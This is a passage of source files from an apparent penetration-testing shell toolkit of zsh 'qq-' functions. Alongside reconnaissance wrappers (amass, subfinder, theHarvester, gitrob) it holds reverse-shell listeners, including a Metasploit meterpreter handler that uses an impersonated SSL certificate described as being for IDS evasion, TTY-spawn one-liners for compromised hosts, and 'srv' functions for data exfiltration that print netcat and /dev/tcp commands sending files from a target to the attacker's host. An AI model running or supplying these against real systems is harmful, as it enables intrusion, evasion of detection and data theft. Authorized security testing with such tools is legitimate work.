The recon-domains namespace provides commands to recon horizontal domains of a root domain.
All domains stored in $__PROJECT/domains/domains.txt and $__PROJECT/amass.
You can sort unique this file in place with the "sfu" alias.
Commands
--------
qq-recon-domains-install: installs dependencies
qq-recon-domains-amass-whois: find domains with whois
qq-recon-domains-amass-asn: find domains by asn
DOC
}
qq-recon-domains-install() {
__info "Running $0..."
__pkgs amass
}
qq-recon-domains-amass-whois() {
__check-project
qq-vars-set-domain
mkdir -p ${__PROJECT}/amass
mkdir -p ${__PROJECT}/domains
print -z "amass intel -active -whois -d ${__DOMAIN} -dir ${__PROJECT}/amass | tee -a ${__PROJECT}/domains/domains.txt"
}
qq-recon-domains-amass-asn() {
__check-project
__check-asn
mkdir -p ${__PROJECT}/amass
mkdir -p ${__PROJECT}/domains
print -z "amass intel -active -asn ${__ASN} -dir ${__PROJECT}/amass | tee -a ${__PROJECT}/domains/domains.txt"
}
================================================
FILE: modules/qq-recon-github.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-recon-github
#############################################################
qq-recon-github-help() {
cat << "DOC"
qq-recon-github
------------
The recon-github namespace provides commands for the recon of github repos.
All output will be stored under $__PROJECT/source
Commands
--------
qq-recon-github-install: installs dependencies
qq-recon-github-user-repos: uses curl to get a list of repos for a github user
qq-recon-github-endpoints: gets a list of urls from all repos of a domain on github
qq-recon-github-gitrob: clones (in mem) repos and searches for github dorks
qq-recon-github-api-set: set github API key global variable
DOC
}
qq-recon-github-install() {
__info "Running $0..."
__pkgs curl jq python3
qq-install-golang
qq-install-github-search
qq-install-git-secrets
qq-install-gitrob
}
qq-recon-github-user-repos() {
__check-project
__check-user
mkdir -p ${__PROJECT}/source
print -z "curl -s \"https://api.github.com/users/${__USER}/repos?per_page=1000\" | jq '.[].git_url' | tee -a ${__PROJECT}/source/${__USER}.txt "
}
qq-recon-github-endpoints() {
__check-api-github
__check-project
qq-vars-set-domain
mkdir -p ${__PROJECT}/source
print -z "github-endpoints.py -t ${__API_GITHUB} -d ${__DOMAIN} | tee -a ${__PROJECT}/source/${__DOMAIN}.endpoints.txt "
}
qq-recon-github-gitrob() {
__check-api-github
__check-project
__check-user
local d=${__PROJECT}/source/${__USER}
mkdir -p $d
cp $HOME/go/src/github.com/codeEmitter/gitrob/filesignatures.json $d
__info "Gitrob UI: http://127.0.0.1:9393/"
print -z "pushd $d ;gitrob -in-mem-clone -save \"$d/output.json\" -github-access-token $__API_GITHUB ${__USER} && popd"
}
================================================
FILE: modules/qq-recon-networks.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-recon-networks
#############################################################
qq-recon-networks-help() {
cat << "DOC"
qq-recon-networks
-------------
The recon-networks namespace provides commands to recon ASNs and IP networks for an organization.
All network data is stored in $__PROJECT/networks.
Commands
--------
qq-recon-networks-install: installs dependencies
qq-recon-networks-amass-asn: find asns by domain
qq-recon-networks-bgp: use the bgp.he.net website to find asns and networks
qq-recon-networks-bgpview-ipv4: curl api.bgpview.io for ipv4 networks by asn
qq-recon-networks-bgpview-ipv6: curl api.bgpview.io for ipv6 networks by asn
DOC
}
qq-recon-networks-install() {
__info "Running $0..."
__pkgs curl jq amass
}
qq-recon-networks-bgp() {
__info "Search https://bgp.he.net/"
}
qq-recon-networks-amass-asns() {
__check-project
__check-org
mkdir ${__PROJECT}/networks
print -z "amass intel -org ${__ORG} | cut -d, -f1 | tee -a ${__PROJECT}/networks/asns.txt "
}
qq-recon-networks-bgpview-ipv4() {
__check-project
__check-asn
mkdir ${__PROJECT}/networks
print -z "curl -s https://api.bgpview.io/asn/${__ASN}/prefixes | jq -r '.data | .ipv4_prefixes | .[].prefix' | tee -a ${__PROJECT}/networks/ipv4.txt"
}
qq-recon-networks-bgpview-ipv6() {
__check-project
__check-asn
mkdir ${__PROJECT}/networks
print -z "curl -s https://api.bgpview.io/asn/${__ASN}/prefixes | jq -r '.data | .ipv6_prefixes | .[].prefix' | tee -a ${__PROJECT}/networks/ipv6.txt"
}
================================================
FILE: modules/qq-recon-org.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-recon-org
#############################################################
qq-recon-org-help() {
cat << "DOC"
qq-recon-org
------------
The recon namespace provides commands for the recon of an organization.
Data from commands will be stored in $__PROJECT/recon.
Commands
--------
qq-recon-org-install: installs dependencies
qq-recon-org-files-metagoofil: uses metagoofil to search and download files for a domain
qq-recon-org-wordlist-cewl: uses cewl to create a custom wordlist from a url
qq-recon-org-theharvester: uses theHarvester to mine data about a target domain
DOC
}
qq-recon-org-install() {
__info "Running $0..."
__pkgs whois metagoofil cewl theharvester
}
qq-recon-org-files-metagoofil() {
__check-project
__check-ext-docs
qq-vars-set-domain
mkdir -p ${__PROJECT}/recon/files
print -z "metagoofil -u \"${__UA}\" -d ${__DOMAIN} -t ${__EXT_DOCS} -o ${__PROJECT}/recon/files"
}
qq-recon-org-files-urls() {
__check-project
qq-vars-set-domain
print -z "strings * | gf urls | grep $__DOMAIN | tee -a ${__PROJECT}/recon/urls.txt"
}
qq-recon-org-wordlist-by-url-cewl() {
__check-project
qq-vars-set-url
mkdir -p ${__PROJECT}/recon
print -z "cewl -a -d 3 -m 5 -u \"${__UA}\" -w ${__PROJECT}/recon/cewl.txt ${__URL}"
}
qq-recon-org-theharvester() {
__check-project
qq-vars-set-domain
mkdir -p ${__PROJECT}/recon
print -z "theHarvester -d ${__DOMAIN} -l 50 -b all -f ${__PROJECT}/recon/harvested.txt"
}
qq-recon-org-cse() {
__info "Use https://cse.google.com/cse/all to create a custom search engine"
}
================================================
FILE: modules/qq-recon-subs.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-recon-subs
#############################################################
qq-recon-subs-help() {
cat << "DOC"
qq-recon-subs
-------------
The recon namespace provides commands to recon vertical sub-domains of a root domain.
All subdomains for a domain will be stored in $__PROJECT/amass and $__PROJECT/domains/$DOMAIN/subs.txt.
You can sort unique this file in place with the "sfu" alias.
Commands
--------
qq-recon-subs-install: installs dependencies
Commands - enumeration
----------------------
qq-recon-subs-amass-enum: enumerate subdomains into amass db (api keys help)
qq-recon-subs-amass-diff: track changes between last 2 enumerations using amass db
qq-recon-subs-amass-names: list gathered subs in the amass db
qq-recon-subs-crt.sh: gather subdomains from crt.sh
qq-recon-subs-subfinder: gather subdomains from sources (api keys help)
qq-recon-subs-assetfinder: gather subdomains from sources (api keys help)
qq-recon-subs-wayback: gather subdomains from Wayback Machine
Commands - brute force
----------------------
qq-recon-subs-brute-massdns: try to resolve a list of subdomains generated for brute forcing
qq-recon-subs-gen-wordlist: generate a wordlist of possible sub domains
Commands - processing
---------------------
qq-recon-subs-resolve-massdns: resolve a file of subdomains using massdns
qq-recon-subs-resolve-parse: parse resolved.txt into A, CNAME and IP's
DOC
}
qq-recon-subs-install() {
__info "Running $0..."
__pkgs gobuster amass curl wordlists seclists dnsrecon dnsutils
qq-install-golang
go get -u github.com/projectdiscovery/subfinder/cmd/subfinder
go get -u github.com/tomnomnom/assetfinder
go get -u github.com/tomnomnom/waybackurls
qq-install-massdns
}
qq-recon-subs-amass-enum() {
__check-project
qq-vars-set-domain
mkdir -p ${__PROJECT}/amass
print -z "amass enum -active -ip -d ${__DOMAIN} -dir ${__PROJECT}/amass"
}
qq-recon-subs-amass-diff() {
__check-project
qq-vars-set-domain
mkdir -p ${__PROJECT}/amass
print -z "amass track -d ${__DOMAIN} -last 2 -dir ${__PROJECT}/amass"
}
qq-recon-subs-amass-names() {
__check-project
qq-vars-set-domain
mkdir -p ${__PROJECT}/amass
print -z "amass db -names -d ${__DOMAIN} -dir ${__PROJECT}/amass | tee -a $(__dompath)/subs.txt"
}
qq-recon-subs-crt.sh() {
__check-project
qq-vars-set-domain
print -z "curl -s 'https://crt.sh/?q=%.${__DOMAIN}' | grep -i \"${__DOMAIN}\" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v \" \" | sort -u | tee -a $(__dompath)/subs.txt "
}
qq-recon-subs-subfinder() {
__check-project
qq-vars-set-domain
__check-threads
print -z "subfinder -t ${__THREADS} -d ${__DOMAIN} -nW -silent | tee -a $(__dompath)/subs.txt"
}
qq-recon-subs-assetfinder() {
__check-project
qq-vars-set-domain
print -z "echo ${__DOMAIN} | assetfinder --subs-only | tee -a $(__dompath)/subs.txt"
}
qq-recon-subs-wayback() {
__check-project
qq-vars-set-domain
print -z "echo ${__DOMAIN} | waybackurls | cut -d "/" -f3 | sort -u | grep -v \":80\" | tee -a $(__dompath)/subs.txt"
}
qq-recon-subs-resolve-massdns() {
__check-project
__check-resolvers
qq-vars-set-domain
print -z "massdns -r ${__RESOLVERS} -s 100 -c 3 -t A -o S -w $(__dompath)/resolved.txt $(__dompath)/subs.txt"
}
qq-recon-subs-brute-massdns() {
__check-project
__check-resolvers
qq-vars-set-domain
__ask "Select the file containing a custom wordlist for ${__DOMAIN} (qq-recon-subs-gen-wordlist)"
local f && __askpath f FILE $(__dompath)
print -z "massdns -r ${__RESOLVERS} -s 100 -c 3 -t A -o S -w $(__dompath)/resolved-brute.txt $f"
}
qq-recon-subs-resolve-parse() {
__check-project
qq-vars-set-domain
__info "Generating files resolved-*.txt"
grep -ie "CNAME" $(__dompath)/resolved.txt | sort -u > $(__dompath)/resolved-CNAME.txt
grep -v "CNAME" $(__dompath)/resolved.txt | sort -u > $(__dompath)/resolved-A.txt
grep -v "CNAME" $(__dompath)/resolved.txt | sort -u | cut -d' ' -f3 | sort -u > $(__dompath)/resolved-IP.txt
}
qq-recon-subs-gen-wordlist() {
__check-project
qq-vars-set-domain
local f && __askpath f FILE /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
print -z "for s in \$(cat ${f}); do echo \$s.${__DOMAIN} >> $(__dompath)/subs.wordlist.txt; done"
}
================================================
FILE: modules/qq-scripts.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-scripts
#############################################################
# qq-scripts-help() {
# cat << "DOC"
# qq-scripts
# -------
# The scripts namespace runs scripts from the quiver
# scripts directory.
# ** IN DEVELOPMENT, NOT READY FOR USE **
# Commands
# --------
# qq-scripts-recon: a zsh recon script
# qq-scripts-webrecon: a zsh webrecon script
# DOC
# }
# qq-scripts-recon() {
# local d && read "d?$(__cyan DOMAIN: )"
# local o && read "o?$(__cyan ORG: )"
# local w && read "out?$(__cyan WORKING\(DIR\): )"
# print -z "zsh ${__SCRIPTS}/recon.zsh ${d} \"${o}\" \"${w}\""
# }
# qq-scripts-webrecon() {
# local f=$(rlwrap -S "$(__cyan FILE:\(DOMAINS\))" -e '' -c -o cat)
# local w && read "out?$(__cyan WORKING\(DIR\): )"
# pushd ${w}
# print -z "zsh ${__SCRIPTS}/webrecon.zsh ${f}"
# popd
# }
================================================
FILE: modules/qq-shell-handlers-msf.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-shell-handlers-msf
#############################################################
qq-shell-handlers-msf-help() {
cat << "DOC"
qq-shell-handlers-msf
---------------------
The shell-handlers-msf namespace provides commands for spawning
reverse shell connections using metasploit.
Commands
--------
qq-shell-handlers-msf-install: installs dependencies
qq-shell-handlers-msf-ssl-gen: impersonate a real SSL certificate for use in reverse shells
qq-shell-handlers-msf-w64-multi-https: multi-handler for staged windows/x64/meterpreter/reverse_https payload
DOC
}
qq-shell-handlers-install-msf() {
__info "Running $0..."
__pkgs metasploit-framework
}
qq-shell-handlers-msf-ssl-gen() {
__ask "Enter the hostname of the site to impersonate"
local r && __prefill r SITE aka.ms
local cmd="use auxiliary/gather/impersonate_ssl; set RHOST ${r}; run; exit "
__info "Use qq-vars-global-set-ssl-shell-cert to the path of the .pem file"
print -z "msfconsole -n -q -x \"${cmd}\" "
}
qq-shell-handlers-msf-w64-https() {
qq-vars-set-lhost
qq-vars-set-lport
__msf << VAR
use exploit/multi/handler;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set LHOST ${__LHOST};
set LPORT ${__LPORT};
set HANDLERSSLCERT ${__SHELL_SSL_CERT};
set EXITONSESSION false
run;
exit
VAR
}
================================================
FILE: modules/qq-shell-handlers.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-shell-handlers
#############################################################
qq-shell-handlers-help() {
cat << "DOC"
qq-shell-handlers
-----------------
The shell-handlers namespace provides commands for spawning reverse shell
connections.
Commands
--------
qq-shell-handlers-install: installs dependencies
qq-shell-handlers-msf-ssl-gen: impersonate a real SSL certificate for use in reverse shells
qq-shell-handlers-nc:
qq-shell-handlers-ncrl:
qq-shell-handlers-nc-udp:
qq-shell-handlers-socat:
DOC
}
qq-shell-handlers-install() {
__info "Running $0..."
__pkgs netcat socat
}
# netcat
qq-shell-handlers-nc() {
qq-vars-set-lport
print -z "nc -nlvp ${__LPORT}"
}
qq-shell-handlers-ncrl() {
qq-vars-set-lport
print -z "rlwrap nc -nlvp ${__LPORT}"
}
qq-shell-handlers-nc-udp() {
qq-vars-set-lport
print -z "nc -nlvu ${__LPORT}"
}
# socat
qq-shell-handlers-socat() {
qq-vars-set-lport
print -z "socat file:`tty`,raw,echo=0 tcp-listen:${__LPORT}"
}
================================================
FILE: modules/qq-shell-tty.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-shell-tty
#############################################################
qq-shell-tty-help() {
cat << "DOC"
qq-shell-tty
------------
The shell-tty namespace provides commands for fixing interactive
command/reverse shells.
Commands
--------
qq-shell-tty-python2: command to spawn a tty shell
qq-shell-tty-python3: command to spawn a tty shell
qq-shell-tty-perl: command to spawn a tty shell
qq-shell-tty-ruby: command to spawn a tty shell
qq-shell-tty-lua: command to spawn a tty shell
qq-shell-tty-expect: command to spawn a tty shell
DOC
}
qq-shell-tty-python2() {
__ok "Copy the commands below and use on the remote system"
cat << "DOC"
python -c 'import pty;pty.spawn("/bin/sh")'
DOC
}
qq-shell-tty-python3() {
__ok "Copy the commands below and use on the remote system"
cat << "DOC"
python3 -c 'import pty;pty.spawn("/bin/sh")'
DOC
}
qq-shell-tty-perl() {
__ok "Copy the commands below and use on the remote system"
cat << "DOC"
perl -e 'exec "/bin/sh";'
DOC
}
qq-shell-tty-ruby() {
__ok "Copy the commands below and use on the remote system"
cat << "DOC"
ruby: exec "/bin/sh"
DOC
}
qq-shell-tty-lua() {
__ok "Copy the commands below and use on the remote system"
cat << "DOC"
lua: os.execute('/bin/sh')
DOC
}
qq-shell-tty-expect() {
__ok "Copy the commands below and use on the remote system"
cat << "DOC"
/usr/bin/expect sh
DOC
}
================================================
FILE: modules/qq-srv.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-srv
#############################################################
qq-srv-help() {
cat << "DOC"
qq-srv
-------
The srv namespace provides commands for hosting local services
such as web, ftp, smb and other services for data exfil or transfer.
Commands
--------
qq-srv-install: install dependencies
qq-srv-web: hosts a python3 web server in current dir
qq-srv-ftp: hosts a python3 ftp server in current dir
qq-srv-smb: hosts an impacket smb server in current dir
qq-srv-tftp: starts the atftpd service in /srv/tftp
qq-srv-smtp: hosts a python3 smtp server in current dir
qq-srv-updog: hosts an updog web server in current dir
qq-srv-nc-tar: hosts a netcat server > tar file in current dir
qq-srv-nc-file: hosts a netcat server > file in current dir
qq-srv-web-hosted: hosts a python3 web server in /srv, port as $1
qq-srv-php-hosted: hosts a php web server in /srv, port as $1
qq-srv-ftp-hosted: hosts a python3 ftp server in /srv
qq-srv-updog-hosted: hosts an updog web server in /srv
DOC
}
qq-srv-install() {
__info "Running $0..."
__pkgs netcat atftpd
__pkgs php python3 python3-pip python3-smb python3-pyftpdlib impacket-scripts
sudo pip3 install updog
}
qq-srv-web() print -z "sudo python3 -m http.server 80"
qq-srv-ftp() print -z "sudo python3 -m pyftpdlib -p 21 -w"
qq-srv-smb() print -z "sudo impacket-smbserver -smb2supp F ."
qq-srv-tftp() print -z "sudo service atftpd start"
qq-srv-smtp() print -z "sudo python3 -m smtpd -c DebuggingServer -n 0.0.0.0:25"
qq-srv-web-hosted() {
__info "Serving content from /srv"
if [ "$#" -eq "1" ]
then
pushd /srv &> /dev/null
sudo python3 -m http.server $1
popd &> /dev/null
else
pushd /srv &> /dev/null
sudo python3 -m http.server 80
popd &> /dev/null
fi
}
qq-srv-php-hosted() {
__info "Serving content from /srv"
if [ "$#" -eq "1" ]
then
pushd /srv &> /dev/null
sudo php -S 0.0.0.0:$1
popd &> /dev/null
else
pushd /srv &> /dev/null
sudo php -S 0.0.0.0:80
popd &> /dev/null
fi
}
qq-srv-ftp-hosted() {
__info "Serving content from /srv"
pushd /srv &> /dev/null
sudo python3 -m pyftpdlib -p 21 -w
popd &> /dev/null
}
qq-srv-updog() {
print -z "updog -p 443 --ssl -p $(__rand 10)"
}
qq-srv-updog-hosted() {
__info "Serving content from /srv"
sudo updog -p 443 --ssl -d /srv
}
qq-srv-nc-tar() {
qq-vars-set-lhost
qq-vars-set-lport
__cyan "Use the command below on the target system: "
echo "tar cfv - /path/to/send | nc ${__LHOST} ${__LPORT}"
print -z "nc -nvlp ${__LPORT} | tar xfv -"
}
qq-srv-nc-file() {
qq-vars-set-lhost
qq-vars-set-lport
__cyan "Use the command below on the target system: "
echo "cat FILE > /dev/tcp/${__LHOST}/${__LPORT}"
print -z "nc -nvlp ${port} -w 5 > incoming.txt"
}
qq-srv-nc-b64() {
qq-vars-set-lhost
qq-vars-set-lport
__cyan "Use the command below on the target system: "
echo "openssl base64 -in FILE > /dev/tcp/${__LHOST}/${__LPORT}"
print -z "nc -nvlp ${__LPORT} -w 5 > incoming.b64 && openssl base64 -d -in incoming.b64 -out incoming.txt"
}
================================================
FILE: modules/qq-vars-global.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-vars-global
#############################################################
qq-vars-global-help() {
cat << "DOC"
qq-vars-global
--------------
The vars global namespace manages environment variables used in other functions
that are saved between sessions. Values are stored as files the .quiver/globals
directory and can contain sensitive information like API keys. These variables
are used to supply arguments to commands in other modules.
Variables
---------
__IMPACKET: full path to the python3 impacket examples directory
__EXT_PHP: a list of file extensions used on PHP webservers
__EXT_DOCS: a list of common documents file types
__API_GITHUB: your personal Github API key
__RESOLVERS: path to public resolvers file
__NOTES: path to the directory containing your markdown notes for qq-notes
__MNU_UA: path to the file containing user-agent strings
__MNU_WORDLISTS: path to the file containing a list of favorite wordlists
__TCP_PORTS: path to the file of favorite TCP ports
__SHELL_SSL_CERT: path to the file of an impersonated SSL cert used for reverse shell IDS evasion
__ALIASES: path to the file containing aliases that will be sourced
Commands
--------
qq-vars-global: list all current global variable values
qq-vars-global-set-*: used to set and save each individual variable
DOC
}
qq-vars-global() {
echo "$(__cyan IMPACKET: ) ${__IMPACKET}"
echo "$(__cyan EXT_PHP: ) ${__EXT_PHP}"
echo "$(__cyan EXT_DOCS: ) ${__EXT_DOCS}"
echo "$(__cyan API_GITHUB: ) ${__API_GITHUB}"
echo "$(__cyan NOTES: ) ${__NOTES}"
echo "$(__cyan RESOLVERS: ) ${__RESOLVERS}"
echo "$(__cyan MNU_UA: ) ${__MNU_UA}"
echo "$(__cyan MNU_WORDLISTS: ) ${__MNU_WORDLISTS}"
echo "$(__cyan TCP_PORTS: ) ${__TCP_PORTS}"
echo "$(__cyan SHELL_SSL_CERT: ) ${__SHELL_SSL_CERT}"
echo "$(__cyan ALIASES: ) ${__ALIASES}"
}
########## __IMPACKET
export __IMPACKET=$(cat ${__GLOBALS}/IMPACKET 2> /dev/null || echo "/usr/share/doc/python3-impacket/examples/")
qq-vars-global-set-impacket() {
__ask "Set the full path to the python3-impacket/examples directory."
__askpath __IMPACKET DIR /
echo "${__IMPACKET}" > ${__GLOBALS}/IMPACKET
}
__check-impacket() { [[ -z "${__PROJECT}" ]] && qq-vars-global-set-impacket }
########## __EXT_PHP
export __EXT_PHP=$(cat ${__GLOBALS}/EXT_PHP 2> /dev/null || echo "php,phtml,pht,xml,inc,log,sql,cgi")
qq-vars-global-set-ext-php() {
__ask "Enter a csv list of PHP server file extensions, ex: php,php3,pht"
__askvar __EXT_PHP EXTENSIONS
echo "${__EXT_PHP}" > ${__GLOBALS}/EXT_PHP
}
__check-ext-php() { [[ -z "${__EXT_PHP}" ]] && qq-vars-global-set-ext-php }
########## __EXT_DOCS
export __EXT_DOCS=$(cat ${__GLOBALS}/EXT_DOC 2> /dev/null || echo "doc,docx,pdf,xls,xlsx,txt,rtf,odt,ppt,pptx,pps,xml")
qq-vars-global-set-ext-docs() {
__ask "Enter a csv list of document file extensions, ex: doc,xls,ppt"
__askvar __EXT_DOCS EXTENSIONS
echo "${__EXT_DOCS}" > ${__GLOBALS}/EXT_DOCS
}
__check-ext-docs() { [[ -z "${__EXT_DOCS}" ]] && qq-vars-global-set-ext-docs }
########## __API_GITHUB
export __API_GITHUB="$(cat ${__GLOBALS}/API_GITHUB 2> /dev/null)"
qq-vars-global-set-api-github() {
__ask "Enter your github API key below."
__askvar __API_GITHUB API_GITHUB
echo "${__API_GITHUB}" > ${__GLOBALS}/API_GITHUB
}
__check-api-github() { [[ -z "${__API_GITHUB}" ]] && qq-vars-global-set-api-github }
########## __API_GOOGLE_DOMAINS
export __API_GOOGLE_DOMAINS="$(cat ${__GLOBALS}/API_GOOGLE_DOMAINS 2> /dev/null)"
qq-vars-global-set-api-google-domains() {
__ask "Enter Google domains username and password for a dynamic DNS domain"
local u && __askvar u USERNAME
local p && __askvar p PASSWORD
local __API_GOOGLE_DOMAINS = $( echo "$u:$p" | base64 )
echo "${__API_GOOGLE_DOMAINS}" > ${__GLOBALS}/API_GOOGLE_DOMAINS
}
__check-api-github() { [[ -z "${__API_GITHUB}" ]] && qq-vars-global-set-api-github }
########## __RESOLVERS
export __RESOLVERS=$(cat ${__GLOBALS}/RESOLVERS 2> /dev/null || echo "${__PAYLOADS}/resolvers.txt")
qq-vars-global-set-resolvers() {
__ask "Set the full path to the file containing a list of resolvers."
__askpath __RESOLVERS FILE $HOME
echo "${__RESOLVERS}" > ${__GLOBALS}/RESOLVERS
}
__check-resolvers() { [[ -z "${__RESOLVERS}" ]] && qq-vars-global-set-resolvers }
########## __NOTES
export __NOTES="$(cat ${__GLOBALS}/NOTES 2> /dev/null)"
qq-vars-global-set-notes() {
__ask "Set the full path to the directory containing markdown notes."
__askpath __NOTES DIR $HOME
echo "${__NOTES}" > ${__GLOBALS}/NOTES
}
__check-notes() { [[ -z "${__NOTES}" ]] && qq-vars-global-set-notes }
########## __MNU_UA
export __MNU_UA="$(cat ${__GLOBALS}/MNU_UA 2> /dev/null || echo "${__PAYLOADS}/user-agents.txt")"
qq-vars-global-set-mnu-ua() {
__ask "Set the full path to the file containing a list of user agent strings"
__askpath __MNU_UA FILE $HOME
echo "${__MNU_UA}" > ${__GLOBALS}/MNU_UA
}
########## __MNU_WORDLISTS
export __MNU_WORDLISTS="$(cat ${__GLOBALS}/MNU_WORDLISTS 2> /dev/null || echo "${__PAYLOADS}/wordlists.txt")"
qq-vars-global-set-mnu-wordlists() {
__ask "Set the full path to the file containing a list of favorite wordlists"
__askpath __MNU_WORDLISTS FILE $HOME
echo "${__MNU_WORDLISTS}" > ${__GLOBALS}/MNU_WORDLISTS
}
########## __TCP_PORTS
export __TCP_PORTS="$(cat ${__GLOBALS}/TCP_PORTS 2> /dev/null || echo "${__PAYLOADS}/tcp-ports.txt")"
qq-vars-global-set-tcp-ports() {
__ask "Set the full path to the file containing a list of favorite TCP ports"
__askpath __TCP_PORTS FILE $HOME
echo "${__TCP_PORTS}" > ${__GLOBALS}/TCP_PORTS
}
########## __SHELL_SSL_CERT
export __SHELL_SSL_CERT="$(cat ${__GLOBALS}/SHELL_SSL_CERT 2> /dev/null || echo "${__PAYLOADS}/aka.ms.pem")"
qq-vars-global-set-shell-ssl-cert() {
__ask "Set the full path to an impersonated SSL certificate in PEM format to use with reverse shells"
__askpath __SHELL_SSL_CERT FILE $HOME
echo "${__SHELL_SSL_CERT}" > ${__GLOBALS}/SHELL_SSL_CERT
}
########## __ALIASES
export __ALIASES="$(cat ${__GLOBALS}/ALIASES 2> /dev/null || echo "${__PAYLOADS}/aliases.rc")"
qq-vars-global-set-aliases() {
__ask "Set the full path to a file containing shell aliases"
__askpath __ALIASES FILE $HOME
echo "${__ALIASES}" > ${__GLOBALS}/ALIASES
}
================================================
FILE: modules/qq-vars.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-vars
#############################################################
qq-vars-help() {
cat << "DOC"
qq-vars
-------
The vars namespace manages environment variables used in other functions. These
variables are set per session, but can be saved with qq-vars-save and reloaded
with qq-vars-load. The values are stored as files in .quiver/vars.
The menu options for some of the variables can be set using qq-vars-global, such
as the list of favorite user-agents or wordlists (qq-vars-global-help).
Variables
---------
__PROJECT: the root directory used for all output, ex: /projects/example
__LOGBOOK: the logbook.md markdown file used in qq-log commands
__IFACE: the interface to use for commands, ex: eth0
__DOMAIN: the domain to use for commands, ex: example.org
__NETWORK: the subnet to use for commands, ex: 10.1.2.0/24
__RHOST: the remote host or target, ex: 10.1.2.3, example: target.example.org
__RPORT: the remote port; ex: 80
__LHOST: the accessible local IP address, ex: 10.1.2.3
__LPORT: the accessible local PORT, ex: 4444
__URL: a target URL, example: https://target.example.org
__UA: the user agent to use for commands, ex: googlebot
__WORDLIST: path to a wordlist file, ex: /usr/share/wordlists/example.txt
__PASSLIST: path to a wordlist for password brute forcing, ex: /usr/share/wordlists/rockyou.txt
Commands
--------
qq-vars: alias qv, list all current variable values
qq-vars-save: alias qvs, save all current variable values ($HOME/.quiver)
qq-vars-load: alias qvl, restores all current variable values ($HOME/.quiver)
qq-vars-clear: clears all current variable values
qq-vars-set-*: used to set each individual variable
DOC
}
qq-vars() {
echo "$(__cyan __PROJECT: ) ${__PROJECT}"
echo "$(__cyan __LOGBOOK: ) ${__LOGBOOK}"
echo "$(__cyan __IFACE: ) ${__IFACE}"
echo "$(__cyan __DOMAIN: ) ${__DOMAIN}"
echo "$(__cyan __NETWORK: ) ${__NETWORK}"
echo "$(__cyan __RHOST: ) ${__RHOST}"
echo "$(__cyan __RPORT: ) ${__RPORT}"
echo "$(__cyan __LHOST: ) ${__LHOST}"
echo "$(__cyan __LPORT: ) ${__LPORT}"
echo "$(__cyan __URL: ) ${__URL}"
echo "$(__cyan __UA: ) ${__UA}"
echo "$(__cyan __WORDLIST: ) ${__WORDLIST}"
echo "$(__cyan __PASSLIST: ) ${__PASSLIST}"
}
alias qv="qq-vars"
qq-vars-clear() {
__PROJECT=""
__LOGBOOK=""
__IFACE=""
__DOMAIN=""
__NETWORK=""
__RHOST=""
__RPORT=""
__LHOST=""
__LPORT=""
__URL=""
__UA="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
__WORDLIST=""
__PASSLIST=""
}
qq-vars-save() {
echo "${__PROJECT}" > $__VARS/PROJECT
echo "${__LOGBOOK}" > $__VARS/LOGBOOK
echo "${__IFACE}" > $__VARS/IFACE
echo "${__DOMAIN}" > $__VARS/DOMAIN
echo "${__NETWORK}" > $__VARS/NETWORK
echo "${__RHOST}" > $__VARS/RHOST
echo "${__RPORT}" > $__VARS/RPORT
echo "${__LHOST}" > $__VARS/LHOST
echo "${__LPORT}" > $__VARS/LPORT
echo "${__URL}" > $__VARS/URL
echo "${__UA}" > $__VARS/UA
echo "${__WORDLIST}" > $__VARS/WORDLIST
echo "${__PASSLIST}" > $__VARS/PASSLIST
qq-vars
}
alias qvs="qq-vars-save"
qq-vars-load() {
__PROJECT=$(cat $__VARS/PROJECT)
__LOGBOOK=$(cat $__VARS/LOGBOOK)
__IFACE=$(cat $__VARS/IFACE)
__DOMAIN=$(cat $__VARS/DOMAIN)
__NETWORK=$(cat $__VARS/NETWORK)
__RHOST=$(cat $__VARS/RHOST)
__RPORT=$(cat $__VARS/RPORT)
__LHOST=$(cat $__VARS/LHOST)
__LPORT=$(cat $__VARS/LPORT)
__URL=$(cat $__VARS/URL)
__UA=$(cat $__VARS/UA)
__WORDLIST=$(cat $__VARS/WORDLIST)
__PASSLIST=$(cat $__VARS/PASSLIST)
qq-vars
}
alias qvl="qq-vars-load"
########## __PROJECT
export __PROJECT=""
qq-vars-set-project() {
__ask "Set the full path to the project root directory where all command output will be directed"
local d && __askpath d "PROJECT DIR" ${__PROJECT}
[[ "$d" == "~"* ]] && __err "~ not allowed, use the full path" && return
__PROJECT=$d
mkdir -p ${__PROJECT}
}
__check-project() { [[ -z "${__PROJECT}" ]] && qq-vars-set-project }
########## __LOGBOOK
export __LOGBOOK=""
qq-vars-set-logbook() {
__ask "Set the full path to the directory of the logbook file (filename not included)."
local d=$(__askpath DIR $HOME)
[[ "$d" == "~"* ]] && __err "~ not allowed, use the full path" && return
mkdir -p $d
__LOGBOOK="${d}/logbook.md"
if [[ -f "${__LOGBOOK}" ]]; then
__warn "${__LOGBOOK} already exists, set as active log"
else
touch ${__LOGBOOK}
echo "# Logbook" >> ${__LOGBOOK}
echo " " >> ${__LOGBOOK}
__ok "${__LOGBOOK} created."
fi
}
__check-logbook() { [[ -z "${__LOGBOOK}" ]] && qq-vars-set-logbook }
########## __IFACE
export __IFACE=""
qq-vars-set-iface() {
if [[ -z "${__IFACE}" ]]
then
__ask "Choose an interface: "
__IFACE=$(__menu $(ip addr list | awk -F': ' '/^[0-9]/ {print $2}'))
else
__prefill __IFACE IFACE ${__IFACE}
fi
}
__check-iface() { [[ -z "${__IFACE}" ]] && qq-vars-set-iface }
########## __DOMAIN
export __DOMAIN=""
qq-vars-set-domain() { __prefill __DOMAIN DOMAIN ${__DOMAIN} }
__check-domain() { [[ -z "${__DOMAIN}" ]] && qq-vars-set-domain }
########## __NETWORK
export __NETWORK=""
qq-vars-set-network() { __prefill __NETWORK NETWORK ${__NETWORK} }
